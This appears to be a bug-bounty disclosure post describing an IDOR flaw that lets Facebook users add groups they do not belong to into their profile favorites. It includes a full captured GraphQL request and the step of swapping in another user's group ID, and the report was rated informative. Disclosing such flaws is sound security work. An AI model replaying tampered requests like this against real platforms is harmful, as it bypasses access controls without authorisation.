Post cover image

June 9, 2026

IDOR allows non-group members to add any group to favorites on their Facebook profile

Allows users who are not members of a group to add any group to their favorites on their Facebook profile.

Rohmad Hidayah

1 min read

Description/Impact

On Facebook, normally only group members can add a group to their profile's favorites. However, this IDOR vulnerability allows non-group members to add any public or private group to their profile. This violates Facebook's policies and rules.

Repro Steps

Users: [User A, User B, Group A, Group B]

Environment: [Group A with owner and admin User A, Group B with owner and admin User B, User A is not a member of Group B, User A gets User B's Group ID B]

Browser: [Firefox]

OS: [Windows]

Reproduction Steps

  1. User A logs into your account at https://web.facebook.com/
  2. User A creates a public/private group with a name, for example, "User A's Group"
  3. User A logs into your profile > clicks the three dots > Turn on professional mode > Turn on > then go to the "About" tab > Communities > Favorite groups > then add "User A's Group" > then "Save" by intercepting the request.
  4. A request with the following parameters will be sent.
POST /api/graphql/ HTTP/1.1
Host: [web.facebook.com](https://web.facebook.com/)
Cookie: USER_A_COOKIE
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:150.0) Gecko/20100101 Firefox/150.0
Accept: */*
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
X-Fb-Friendly-Name: useProfileCometDirectorySectionSaveMutation
X-Fb-Lsd: tf7HoI5Xtfnkruo-5fRnZM
X-Asbd-Id: 359341
Content-Length: 4777
Origin: [https://web.facebook.com](https://web.facebook.com/)
Referrer: [https://web.facebook.com/petanijagungg/directory_communities](https://web.facebook.com/petanijagungg/directory_communities)
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
Connections: keep-alive

av=61554410315919&__aaid=0&__user=61554410315919&__a=1&__req=26&__hs=20573.HYP%3Acomet_pkg.2.1…0&dpr=1&__ccg=GOOD& __rev=1038478904&__s=v83elk%3Ajezoq9%3Acy7ydh&__hsi=7634427810661777765&__dyn=7xeUjGUW13xt0mUyEqxemh0MBwCwWwIxu13wFw hUKbgS3q2ibwNw9G2Saxa1NwJwpUe8hwaG0Z82_CxS320qa2OU7m2210wEwgo9oO0-E4a3a4oaEnxO0Bo7O2l2Utwqo5W1ywiE4u9x-3m1mzXw8W58jwGzEjzF U5e3ym2SU4i5oe8cEW4–5pUfEe88o4qum7–2K3y0EouwLyEbUGdG1QwVwwwOg2ZwhEkxebwHwKG4VUjwFg2fwxyo566k1fxC13xecwBwUU-4rwEKufxamEbbxG1 fBG2–1mwto46fwk83KwHwOyUqxG0K83jxG&__csr=l0DgmgmMHsh2AaNTvbst10yNds9ZMBbdkviT922lT6lvk_tiYszN2iFT8z9vIAOJFrHFfmAhbqhKCKjWh 2AFiAVeQiFt6YDlFBO9S8Lj89noyiGjGKL_TqkOYZtbVaZliGWRm8FHKuV5GKimmhaQaVvmiWRyqyvJFmeBnCl5CBFAVQhlGiGXAhAFFGGWQdplqEyF-qAiAFe- aKHAAK8KqkCcxaHDKV6FUOGGcABhUZ9umuuDGBhvJypFFogK8LtavqhKmFazoN4Bhd4zbzEzBCxamcgNoGVqhaVXFuF8Fa4UkWDAyfHBCXy49rXmUJHWKFXxBx a9CDypQuuazKXG59WyHzuAdzoZ4LJ13xeGpo_yoiGchpbxuEG7EjxibzrGmVUiCx91G49ayWx-cBHzrykbgjxu8DDyGzEG4orAxbUaVUCEScAx68wCyUKU8E8oG 5qx26UV1Fa9LxCehUSi2–4u58yAEowRxmu291J1i10wKhExBxC6UuwzyEcoboS5UiwxK68cFU7u6o3JBwkE8UoUa811ZwDwn8boW1ywpo2Lw_w9e3efK8xFyoa k2aCAFGZ2EhwiUC7A9yo8E4nyE8UC3O3CcyU0Zh0c902po0eko13602bSczQ04CU0vCK28w07pe01HQwNoswpk1ExG0v5wrobe0vSaK0gu6o6q1izpy0125wnZx no3qw0xhxN481Nyo086u0mS3W3G0mq0kp02jU4W05p60aRw69g1OPz87h1S9lBw0g_o38w1fa09zc3K2u0zE1TU1j61OQifwNg4r81lwnU0Dq04RUdC1Fw7jo1 AU6B8EO78rQ16gnDwMxu77w2dsw1hU66045EGajo1dE&__hsdp=gby542i5h2qi3x2GI889AgwggtAasohEPeo8414ChF84N1G3aEN38kynqiaxOMwKzdAMIy8q 4xY9TfR3N0iC94EUukj7awV2q8Bi5gEoso989PmIMBN2p3ggiA_paaBBEGO7EmesG94bayCVyGgwVCtEYh68P1fi1pORbAEB4Ebii2xyj4djTrcxG316ClWOGA ty28cFE8GEFcxd5BiBgih8Wl5yOQsi9h4At2k9gSQV93DF6z4t5eRADBaFAG8p7zoiXh9rDGifBCN2gNk4m2e2ivEMJbo-UG5216p6yFO2EnhixgkBwAGEiaEId DJxuehF8O1lLtczA9h4i4EKqib8tXm2dx2axe2S2qfy8B38izp8S9giBiwTF0Ty8mwBgc4h1haV9Uhxm4XyE8ouyU529HG3yU1eBx69o6mU4–58aEmyBUcUQN8 eo9K26to8E8–4WAyA1rQ3Gcxiqqel2E6iEKcwQDRgix60zBl0q9Gg2CAwl8rx-0Co9_zUB2Ulwlo3uBxC7Wg2lG1vU3Myo3EwuUfE5Sm0iCbwNws8fU6u0CE2Ow IwaO10w5iw9i4E2OwbC0EE4i7Uf84iq2y0Cob8pwoUy1Cwv836zoaU6a15xiu0jK1MwJwkE5y0mm0Z40sC0Dpo6G1XwqE1qU560vS0Oo5q1sAzE8o2Sg4m3e1z we6mu7obE5q2i0SQ0hO1Inwk86B0kawPx227K1-g3oxu6E1kFUC1_K1rwww5iz84–5o0Aqm0S8y&__hblp=0xDZ0OhFh3l3p89e1XgiwZwio2qxZ1WA2y1kU3s zQ322fG2m10wxy8G2S0LUqxydwhU88izQ7EcQi6Urwlk9xe26dzU564opwWwBwExSVEbU5S4UuwVwpo6K9y88Wx67oB0Ag24zU4q2mfwTwExa8wYxi7p45C8xC 5onyEx0SyU4Z2o4Kcwjo3pxe2O14F0jA9yEpG2iewQxa3W1awIxm4e5984u69qwnoS1HxqEoxS5F-A4Ehw9a1Cwzwio4y222SawgE2iwHwDxi1lwxwbOm4VopBF 3o5O2GEbUb-5VXVoowCx-4UG489EOaDws85q68a85a3W1tBz86–1KxO22byEC1nCwwzofU-awSyEGbw8W0TUaEa85y10zE4q2C1DwqE2kxa1mxG10w8C5opwaa 14yUjwFxai5U2dwoUC6oyq4E6e8wpE76awoEqwKxCdwHwoElUbokDw4Xws8–6985a350BxK2y0i24p8qwDU5a16wuF8ao-0g-0Dpo6G1XwqEdU1cVo4K0giU6K1 mwNxOdwpUdEtguxy1sAzE8o4C1szQ15wPwoU3xBDzEy2y8Hwl8983rg10Uowr5U4u8wqk1gG14wxXwLwjA0Q9VohxG1Kweeu9wzwmXwXx-1AwdN3EG8zoOmfgo x-5o5a32dxO0pum740J9ohw&__sjsp=gby542i5h2qi3x2GI889AgwggtAasohEPeo8414ChF84N1Gf48WEN38kynqiSyAaI8bEPpwz8y8q4xYIQRPZgB5A1aoA izxVhcsG3A9Eyl8l2xxNwyMDilHcahmSgzJUp8jJDKmmC9yy0wHyoBDVAGBoXCtcYhoVJ1EMdWy26BQ4lq8C7kem9DhK2RCGp7yowy2cF6wwUR2Z2QFk4Ai5oh mEwi9h4At2k9ghjxG7kfm2sxVUS64ewKgx35gig4y7kEnx-3ow8A1ox8GyMQ3S1JgdU9k8hk0hO643R0cJ049UeXw2tRU2IU0iRwc7x69z809y8&__comet_req =15&fb_dtsg=NAfuWwrfT_MnJMbqq4-FxJaJA2FwWrm72bKzHmYktqi1sdnLDwk2tJg%3A5%3A1767594021&jazoest=25660&lsd=tf7HoI5Xtfnkruo-5fR nZM&__spin_r=1038478904&__spin_b=trunk&__spin_t=1777528741&__crn=comet.fbweb.CometProfileDirectoryCommunitiesTabRoute&fb_ap i_caller_class=RelayModern&fb_api_req_friendly_name=useProfileCometDirectorySectionSaveMutation&server_timestamps=true&var iables=%7b%22input%22%3a%7b%22actor_id%22%3a%2261554410315919%22%2c%22client_mutation_id%22%3a%222%22%2c%22directory_sectio n_type%22%3a%22FAVORITE_GROUPS%22%2c%22items%22%3a%5b%7b%22associated_entity_id%22%3a%22GROUP_A_ID%22%2c%22id%22%3a%22GROU P_A_ID%22%2c%22subtitle%22%3a%22%22%2c%22text%22%3a%22Farmer%20Corn%22%7d%5d%2c%22logging_data%22%3a%7b%22nav_chain%22%3a%22ProfileCometAboutTabRoot.react%2ccomet.profile.collection.directory_communities%2cunexpected%2c1777528748479%2c231791%2c%2c%2c%3bProfileCometAboutTabRoot.react%2ccomet.profile.collection.about%2cunexpected%2c17775 28745132%2c28534%2c%2c%2c%22%7d%2c%22privacy%22%3a%7b%22allow%22%3a%5b%5d%2c%22base_state%22%3a%22EVERYONE%2 2%2c%22deny%22%3a%5b%5d%2c%22tag_expansion_state%22%3a%22UNSPECIFIED%22%7d%2c%22session_id%22%3a%225181c298–3 e68–4431-bbd1-bd50315c5d06%22%2c%22should_share_to_feed%22%3afalse%7d%2c%22sectionToken%22%3a%22YXBwX3NlY3Rp b246NjE1NTQ0MTAzMTU5MTk6MjMyNzE1ODIyNw%3d%3d%22%2c%22collectionToken%22%3a%22YXBwX2NvbGxlY3Rpb246cGZiaWQwNlJW SEV3Y1RoNVhwbnVURmpZakJyQkd4Zkh4eVk2S0FpRG4yTW1qYnNpV0tDN3dqWjZia2ZXc0M0dGVtUGFiczZTRnRXeUoyaVhFZUQ5N013 eFNDN0xuamtKWmtnbA%3d%3d%22%2c%22useDefaultActor%22%3afalse%2c%22scale%22%3a1%7d&doc_id=26810498305226299
  1. In this parameter **"associated_entity_id":"GROUP_A_ID","id":"GROUP_A_ID"**, change it to User B's Group ID > send the request > the server will return a **200 OK** response.
  2. User A returns to the browser > refresh the page > User B's Group B will be successfully added to your profile without you needing to be a member of Group B first.

Timeline

April 30, 2026: Submit Report May 5, 2026: Initial Evaluation June 9, 2026: Informative

None